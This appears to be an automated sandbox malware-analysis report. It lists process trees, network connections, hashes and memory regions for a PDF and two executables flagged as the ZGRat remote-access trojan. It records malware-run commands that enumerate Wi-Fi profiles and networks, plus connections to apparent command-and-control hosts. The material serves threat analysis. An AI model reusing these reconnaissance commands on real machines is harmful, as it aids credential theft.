N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3916 wrote to memory of 1652 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3916 wrote to memory of 4544 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3916 wrote to memory of 2760 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3916 wrote to memory of 3716 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 4964 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 3716 wrote to memory of 376 N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

Processes

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RIB.pdf"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FF7CE518D4EC21B0743587B82E6ECC8E --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7D6AC1F5870E0F078293E6A6E0CDAEF5 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7D6AC1F5870E0F078293E6A6E0CDAEF5 --renderer-client-id=2 --mojo-platform-channel-handle=1808 --allow-no-sandbox-job /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F920421836A4D80FFB4795834086BD86 --mojo-platform-channel-handle=2308 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=169BB5BAB9F9F7C182E71310ACE2C663 --mojo-platform-channel-handle=2412 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=94AD9E1E45E47E153EA99DEFD214CF1C --mojo-platform-channel-handle=2420 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=CC4D037BE538E059872178F8193148FF --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=CC4D037BE538E059872178F8193148FF --renderer-client-id=8 --mojo-platform-channel-handle=2304 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=236DD7BCEA487CAEDD45801581597C13 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=236DD7BCEA487CAEDD45801581597C13 --renderer-client-id=10 --mojo-platform-channel-handle=2684 --allow-no-sandbox-job /prefetch:1

Network

Country Destination Domain Proto
NL 52.142.223.178:80 N/A tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 74.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 169.0.37.23.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 14.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 114.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 23.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 5.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 192.98.74.40.in-addr.arpa udp

Files

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 b30d3becc8731792523d599d949e63f5
SHA1 19350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256 b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 752a1f26b18748311b691c7d8fc20633
SHA1 c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512 a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

memory/3916-28-0x0000000009770000-0x0000000009791000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 e5b1404a25894361f2981fd4d9b1fa01
SHA1 a5bd0a94f2bfab6b10dcc61280747e98dcb1448b
SHA256 02ac40ae1bba053d949c71fb2849105424a2db85b00a5029eb43c5c18d963724
SHA512 84dcc3f6b2791d4c86948308151d9708c00fd84dea42fe27a05fab83bd30a21965c652fa9cb607013867d325a952aea67297bf9f8086403e9ebdd7c3d12a0fff

memory/3916-133-0x0000000009770000-0x0000000009791000-memory.dmp

memory/3916-135-0x000000000A300000-0x000000000A44D000-memory.dmp

memory/3916-143-0x000000000A300000-0x000000000A44D000-memory.dmp

memory/3916-146-0x000000000A590000-0x000000000A5BA000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

144s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

ZGRat

rat zgrat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3580 set thread context of 1596 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe"

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 138.91.171.81:80 N/A tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
NL 38.170.242.108:7785 N/A tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 23.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 31.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 29.179.17.96.in-addr.arpa udp

Files

memory/3580-0-0x0000020FBB5C0000-0x0000020FBB728000-memory.dmp

memory/3580-2-0x00007FF813890000-0x00007FF814351000-memory.dmp

memory/3580-3-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-4-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-8-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-14-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-24-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-32-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-38-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-40-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-46-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-52-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-56-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-64-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-66-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-62-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-60-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-58-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-54-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-50-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-48-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-44-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-42-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-36-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-34-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-30-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-28-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-26-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-22-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-20-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-18-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-16-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-12-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-10-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-6-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp

memory/3580-1-0x0000020FD5C80000-0x0000020FD5DE2000-memory.dmp

memory/3580-936-0x0000020FBD3A0000-0x0000020FBD3A1000-memory.dmp

memory/3580-935-0x0000020FD5C70000-0x0000020FD5C80000-memory.dmp

memory/3580-938-0x0000020FD5DE0000-0x0000020FD5E2C000-memory.dmp

memory/3580-937-0x0000020FD5B30000-0x0000020FD5C28000-memory.dmp

memory/1596-942-0x0000000140000000-0x00000001400D0000-memory.dmp

memory/1596-945-0x000001E14EE80000-0x000001E14EF8A000-memory.dmp

memory/1596-944-0x00007FF813890000-0x00007FF814351000-memory.dmp

memory/3580-943-0x00007FF813890000-0x00007FF814351000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Walter.exe.log

MD5 9f5d0107d96d176b1ffcd5c7e7a42dc9
SHA1 de83788e2f18629555c42a3e6fada12f70457141
SHA256 d0630b8466cebaaf92533826f6547b6f36a3c480848dc38d650acd52b522a097
SHA512 86cfaa3327b59a976ddd4a5915f3fe8c938481344fcbd10e7533b4c5003673d078756e62435940471658a03504c3bc30603204d6a133727a3f36c96d08714c61

memory/1596-3162-0x000001E14F030000-0x000001E14F0CE000-memory.dmp

memory/1596-3163-0x00007FF813890000-0x00007FF814351000-memory.dmp

memory/1596-3164-0x000001E14F020000-0x000001E14F030000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

16s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

ZGRat

rat zgrat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4824 set thread context of 1540 N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe"

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe

C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

Network

Country Destination Domain Proto
NL 52.142.223.178:80 N/A tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 41.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 magic.poisontoolz.com udp
US 172.67.162.192:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 192.162.67.172.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
NL 52.142.223.178:80 N/A tcp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp
GB 96.17.179.12:80 N/A tcp

Files

memory/4824-0-0x00000000009D0000-0x00000000009E4000-memory.dmp

memory/4824-1-0x0000000074FF0000-0x00000000757A0000-memory.dmp

memory/4824-2-0x0000000005550000-0x0000000005560000-memory.dmp

memory/4824-3-0x0000000002EA0000-0x0000000002EA6000-memory.dmp

memory/4824-4-0x0000000006E90000-0x000000000709A000-memory.dmp

memory/4824-5-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-8-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-10-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-6-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-14-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-16-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-18-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-20-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-24-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-26-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-28-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-30-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-22-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-32-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-34-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-38-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-40-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-36-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-42-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-44-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-46-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-50-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-52-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-56-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-54-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-58-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-60-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-62-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-64-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-48-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-68-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-66-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-12-0x0000000006E90000-0x0000000007095000-memory.dmp

memory/4824-937-0x0000000002DE0000-0x0000000002DE1000-memory.dmp

memory/4824-939-0x0000000007320000-0x000000000736C000-memory.dmp

memory/4824-938-0x0000000007430000-0x00000000075D2000-memory.dmp

memory/4824-940-0x0000000007C00000-0x00000000081A4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\building.exe.log

